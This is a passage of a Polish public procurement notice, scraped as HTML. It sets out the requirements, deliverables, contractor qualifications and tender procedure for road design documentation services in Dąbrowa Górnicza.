Zamawiającego nawskazanie znaku towarowego, patentu lub pochodzenia, wykonawca jest zobowiązany opisać wdokumentacji specyfikę powodującą konieczność takiego wskazania oraz użyć słów ,,lubrównoważne". W takim przypadku obowiązkiem wykonawcy jest określenie szczegółowychparametrów, które umożliwią dopuszczenie towarów i urządzeń innych producentów jakorównoważnych. 8. Stosowane materiały. W opracowanej dokumentacji technicznej wszystkiezastosowane rozwiązania techniczne jak również proponowane do wbudowania materiały muszą byćuzgodnione z Zamawiającym oraz instytucjami zarządzającymi przebudowywaną infrastrukturą. 9.Wersja elektroniczna rysunków technicznych. Rysunki techniczne muszą być wykonane w programietypu CAD (pliki z rozszerzeniem *.dwg, oraz *.pdf). 10. Pełne opracowanie dla zamówienia obejmujewykonanie: 10.1. wariantów koncepcyjnych, które muszą być wykonane i zdane Zamawiającemu,każdy w 2 egzemplarzach w wersji papierowej, 10.2. projektu budowlanego i projektówwykonawczych, o których mowa w pkt 2, który musi być wykonany i zdany Zamawiającemu dlakażdego opracowania w 4-ch egzemplarzach w wersji papierowej, 10.3. cała dokumentacjawymieniona w pkt. 10.1 i 10.2 musi być sporządzona w wersji elektronicznej (w formacieedytowalnym oraz *.pdf) i przekazana Zamawiającemu na urządzeniu umożliwiającym edycję iwprowadzanie zmian. 10.4. Dokumentacja budowlana powinna być kompleksowym opracowaniemwykonanym zgodnie zobowiązującymi przepisami i normami, posiadającym wymagane przepisamiuzgodnienia, opinie i sprawdzenia, na podstawie którego Inwestor uzyska pozwolenie na budowę /zgłoszenia zamiaru wykonania robót budowlanych i zrealizować rzeczowo przedmiot dokumentacjiprojektowej. 11. Plany, wizualizacje 1. Wykonawca zobowiązany jest do umieszczenia, w czytelnysposób, wariantów koncepcyjnych inwestycji na planie miasta Dąbrowa Górnicza w skali najbliższegosąsiedztwa inwestycji z wyraźnym oznaczeniem powierzchni inwestycji, punktów odniesienia(otoczenie inwestycji) i kierunków geograficznych. Zaleca się by powstały w ten sposób planinwestycji był łatwy do odczytania dla odbiorcy, który na co dzień nie korzysta z planówbudowlanych. 2. Wykonawca zobowiązany jest wykonania wizualizacji sporządzonych wariantówkoncepcyjnych inwestycji oraz wariantu stanowiącego podstawę do wykonania dokumentacjibudowlanej: 1) w ujęciu na całą inwestycję - plan ogólny, 2) w ujęciach ukazujących inwestycję zkażdego kierunku geograficznego (północ- południe-wschód-zachód), 3) w ujęciu od najbardziejatrakcyjnej strony inwestycji, 3. Plany i wizualizacje przedstawione przez Wykonawcę musząoznaczać się: 1) możliwie dokładnym odwzorowaniem planowanej inwestycji (precyzja i dbałość oszczegóły), 2) czytelnością 3) wysokimi walorami estetycznymi (atrakcyjność wizualna) 4. W każdymprzypadku wymaga się od Wykonawcy dostarczenia planów i wizualizacji w formie wydruku naplanszach o wymiarach co najmniej B2 (50x70 cm) oraz w odpowiedniej jakości plikachelektronicznych, w sposób umożliwiający publikację planów i wizualizacji w materiałachinformacyjnych Zamawiającego oraz wydruk we wskazanym formacie. 12. W trakcie pracprojektowych Wykonawca uzgodni z Zamawiającym rozwiązania sytuacyjne i konstrukcyjne wzakresie układów drogowych, technologii, wzmocnienia podłoża gruntowego. 13. Wykonawcazobowiązany jest do uczestnictwa w zorganizowanym przez zamawiającego spotkaniu/ konsultacjachz mieszkańcami miejscowości, przez które przebiegają objęte pracami projektowymi odcinki dróg wcelu dodatkowych uzgodnień w zakresie zjazdów na posesje itp. 14. Po przekazaniu koncepcjiprogramowo-przestrzennej, w celu jej uzgodnienia Wykonawca weźmie udział w wizji lokalnejzorganizowanej przez Zamawiającego na objętym pracami projektowymi odcinku drogi. 15. Materiałyprzekazane przez Zamawiającego, stanowiące załącznik nr 9 do SIWZ: 1) Pismo nr WKMI.7021.7.2017.AR z dnia 05.01.2017r. 2) Pismo nr WKM-I.7021.292.2016.SC z dnia 27.07.2016r. 3)Pismo nr WKM.II.7002.221.2016.GW z dnia 17.10.2016r. 4) Pismo nr WGK.6621.4.33.2017.AM zdnia 03.02.2017r. 5) Pismo nr WKM-I.7021.7.2017.AR/BK z dnia 14.03.2017r. 6) Pismo nrWKD.7234.1.8.2017.AK z dnia 27.02.2017r. 7) Pismo nr WGN-I.6872.4.1.2017.AG z dnia14.02.2017r. 16. Wykonawca wykona i przekaże Zamawiającemu dokumentację projektową w ilościegzemplarzy jak niżej: 1) Aktualna mapa do celów projektowych w skali 1:500 - 1 egz., 2)Dokumentacja geotechniczna podłoża gruntowego - 1 egz., 3) Koncepcja zawierająca plan sytuacyjno- wysokościowy (wersja papierowa i elektroniczna) - 2/wariant, 4) Materiały do uzyskania decyzji ośrodowiskowych uwarunkowaniach wraz z decyzją (o ile będzie wymagane) - 1 egz., 5)Inwentaryzacja przyrodnicza (o ile będą wymagane) - 1egz., 6) Operaty wodno prawne wraz zpozwoleniem (o ile będą wymagane) - 1egz., 7) Warunki, uzgodnienia i opinie niezbędne doprawidłowego opracowania dokumentacji projektowej (w tym warunków technicznych i uzgodnień odwłaścicieli urządzeń obcych infrastruktury technicznej) - 1 kpl., 8) Projekt budowlany i projektywykonawcze - 4 egz., 9) Szczegółowe specyfikacje techniczne - 3 egz., 10) Przedmiar robót - 3 egz.,11) Kosztorys inwestorski, zbiorcze zestawienie kosztów - 3 egz., 12) Projekt stałej organizacji ruchu 3 egz., 13) Plan wyrębu drzew i krzewów (o ile będą wymagane) - 3 egz., 14) Informacja dotyczącabezpieczeństwa i ochrony zdrowia - 3 egz., 15) Decyzja o pozwoleniu na budowę lub informacja obraku konieczności uzyskania takiej decyzji. - 2 egz., 16) Wersja elektroniczna dokumentacji - 2 egz.,17) Plany i wizualizacje - 4 plany, 4 wizualizacje. Ilości podane powyżej (w pkt. od 1) do 17)) nieobejmują egzemplarzy niezbędnych do uzyskania warunków, uzgodnień, opinii, decyzji orazrejestracji opracowań w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej wDąbrowie Górniczej. III. Wymagania dotyczące ubezpieczenia Wykonawcy. Wykonawca w okresierealizacji przedmiotu zamówienia musi posiadać aktualne ubezpieczenie od odpowiedzialnościcywilnej w zakresie prowadzonej działalności na sumę gwarancyjną nie mniejszą niż 200.000,00 zł(słownie: dwieście tysięcy złotych 00/100) lub dla walut obcych na kwotę w wysokości równoważnejliczonej wg średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP iobowiązującego w dniu, w którym zamieszczone zostało ogłoszenie o zamówieniu w BiuletynieZamówień Publicznych. Wykonawca utrzyma ważność ubezpieczenia przez cały okres realizacjiUmowy. IV. Obowiązek zatrudnienia na umowę o pracę. Z uwagi na charakter zamówieniawymagania względem zatrudnienia na umowę o pracę osób wykonujących wskazane przezZamawiającego czynności w zakresie realizacji zamówienia nie zostają wprowadzone przezZamawiającego bowiem nie ma wypełnionych przesłanek zatrudnienia na umowę o pracę określonychw art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz.U. z 2016 r., poz. 1666). V.Gwarancja i rękojmia 1. Wykonawca udziela rękojmi za wady wykonanej dokumentacji projektowejna okres od jej odbioru do końca obowiązywania umowy. 2. Wykonawca jest odpowiedzialnywzględem Zamawiającego z tytułu rękojmi za wady dzieła zgodnie z art. 638 Kodeksu cywilnego wzwiązku z art. 556 i następnymi Kodeksu cywilnego. 3. Upływ terminu gwarancji na prace projektowenastąpi po zakończeniu i odebraniu robót budowlanych, wykonywanych na podstawie dokumentacjiprojektowej wykonanej przez Wykonawcę.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">71320000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71248000-8</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">1. Zakres usług polegać będzie na powtórzeniu podobnych usług, co w zamówieniu podstawowymi zgodnych z przedmiotem zamówienia podstawowego w pełnym zakresie rzeczowym określonym w pkt. 3.3. SIWZWarunki świadczenia przyszłej usługi będą przedmiotem rokowań z Wykonawcą i będą obejmowały wymagania nie gorsze niż ustalone względem zamówienia podstawowego.2. Zamawiający przewiduje, iż wartość tych usług może wynieść maksymalnie do 30 % wartości zamówienia podstawowego.3. Zamówienie, o którym mowa w art. 67 ust.1 pkt. 6 ustawy Pzp zostanie udzielone na warunkach określonych w ustawie Pzp w trybie zamówienia z wolnej ręki.4. Wykonawca przystąpi do wykonania usługi wyłącznie po zawarciu umowy pod warunkiem zaistnienia przesłanek, o których mowa w art. 67 ust 1 pkt 6 ustawy Pzp, po uprzednio przeprowadzonych negocjacjach dot. w szczególności zakresu, terminu realizacji, ceny oferty oraz warunków płatności. Przystąpienie przez Wykonawcę do realizacji zamówienia publicznego objętego protokołem konieczności, bez uprzedniego zawarcia umowy z Zamawiającym nie uprawnia Wykonawcy do żądania od Zamawiającego zapłaty wynagrodzenia za wykonanie/ częściowe wykonanie usług. </span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-12-15</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Dot. sekcji II.8 ogłoszenia-Okres, w którym realizowane będziezamówienie:1. Rozpoczęcie realizacji zamówienia - od daty podpisania umowy.2. Zakończenie terminu realizacji zamówienia: do 15.12.2018r. w tym:2.1. termin wykonania 3 wariantów koncepcji programowo - przestrzennej - do 4 miesięcy od daty podpisania umowy2.2. termin wykonania dokumentacji projektowej - do 10 miesięcy od daty podpisania umowy2.3. termin pełnienia nadzorów autorskich - do 15.12.2018r. </span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie określa warunku w tym zakresie. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Za minimalny poziom zdolności uznane zostanie, wykazanie przez Wykonawcę, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 200.000,00 zł, lub dla walut obcych na kwotę w wysokości równoważnej liczonej według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którym zamieszczone zostało ogłoszenie o niniejszym zamówieniu w Biuletynie Zamówień Publicznych. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Za minimalny poziom zdolności uznane zostanie, wykazanie przez Wykonawcę, że:1. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał usługi, których należyte wykonanie zostało potwierdzone przez podmiot na rzecz, którego były wykonane, w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia tj. : - minimum 1 usługę obejmującą wykonanie koncepcji programowo-przestrzennej przebudowy drogi klasy Z lub wyższej klasy,- minimum 2 usługi polegające na opracowaniu dokumentacji projektowej obejmującej projekty budowlane i wykonawcze dotyczące przebudowy i/lub budowy drogi klasy Z lub wyższej klasy. - minimum 1 usługę polegającą na wykonaniu koncepcji lub projektu zagospodarowania terenu na kwotę min. 50 000,00 zł brutto.Zamawiający dopuszcza wylegitymowanie się wykonaniem koncepcji i opracowaniem dokumentacji projektowej realizowanymi w ramach jednego zadania.2. skieruje do realizacji zamówienia publicznego osoby, w szczególności odpowiedzialne za świadczenie usług tj.: minimum 1 osobę wyznaczoną do pełnienia funkcji Głównego Projektanta posiadającą uprawnienia do projektowania w branży drogowej bez ograniczeń zgodnie z ustawą Prawo Budowlane (t.j. Dz. U. z 2017 r., poz. 1332) lub odpowiadające im ważne uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów obowiązujących na terenie kraju, z którego pochodzi dana osoba, które w zakresie objętym zamówieniem będą pozwalać na pełnienie samodzielnych funkcji technicznych w budownictwie w ww. specjalności.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">W celu potwierdzenia przez wykonawcę, którego oferta została najwyżej oceniona braku podstawwykluczenia, zgodnie z art. 26 ust. 2 ustawy Pzp Zamawiający wezwie do złożenia w terminie 5dni, następujących oświadczeń i dokumentów aktualnych na dzień ich złożenia: 1. odpisu zwłaściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeliodrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstawwykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">W celu potwierdzenia spełniania przez Wykonawcę, którego oferta została najwyżej oceniona,warunków udziału w postępowaniu, zgodnie z art. 26 ust. 2 ustawy Pzp Zamawiający wezwie dozłożenia w terminie 5 dni, następujących oświadczeń i dokumentów aktualnych na dzień ichzłożenia: 1. wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłychrównież wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeliokres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości,przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, orazzałączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywanenależycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawioneprzez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowychlub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterzewykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadkuświadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumentypotwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przedupływem terminu składania ofert - wzór wykazu stanowi załącznik nr 5 do SIWZ, 2. wykazu osób,skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególnościodpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi,wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia iwykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresuwykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami wzór wykazu stanowi załącznik nr 6 do SIWZ. 3. dokumentu potwierdzającego, że wykonawca jestubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej zprzedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego w pkt. 8.2.2.SIWZ.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Zamawiający nie wymaga oświadczeń ani dokumentów w celu potwierdzenia okoliczności, októrych mowa w art. 25 ust.1 pkt 2 ustawy Pzp</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1.Formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania), 2.Pełnomocnictwo doreprezentowania Wykonawcy lub inny stosowny dokument - jeżeli zostało ustanowione bądź doreprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formieoryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);pełnomocnictwo ustanowione do reprezentowania Wykonawców wspólnie ubiegających się ozamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza. 3.Dokument(-y), np. zobowiązanie podmiotów, na zasobach których Wykonawca będzie polegał wtrybie art. 22a ustawy Pzp, do oddania mu do dyspozycji niezbędnych zasobów na potrzebyrealizacji zamówienia, treści których musi wynikać w szczególności: - zakres dostępnychWykonawcy zasobów innego podmiotu, - sposób wykorzystania zasobów innego podmiotu, przezWykonawcę, przy wykonywaniu zamówienia publicznego, - zakres i okres udziału innegopodmiotu przy wykonywaniu zamówienia publicznego, - czy podmiot, na zdolnościach któregoWykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczącychwykształcenia, kwalifikacji zawodowych lub doświadczenia. 4. W terminie 3 dni od zamieszczeniana stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, oświadczeniawykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej o którejmowa w art. 24 ust. 1 pkt 23 ustawy Pzp zgodnie ze wzorem stanowiącym załącznik nr 4 do SIWZ.Wraz ze złożeniem oświadczenia, Wykonawca może złożyć dokumenty bądź informacjepotwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji wpostępowaniu</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span 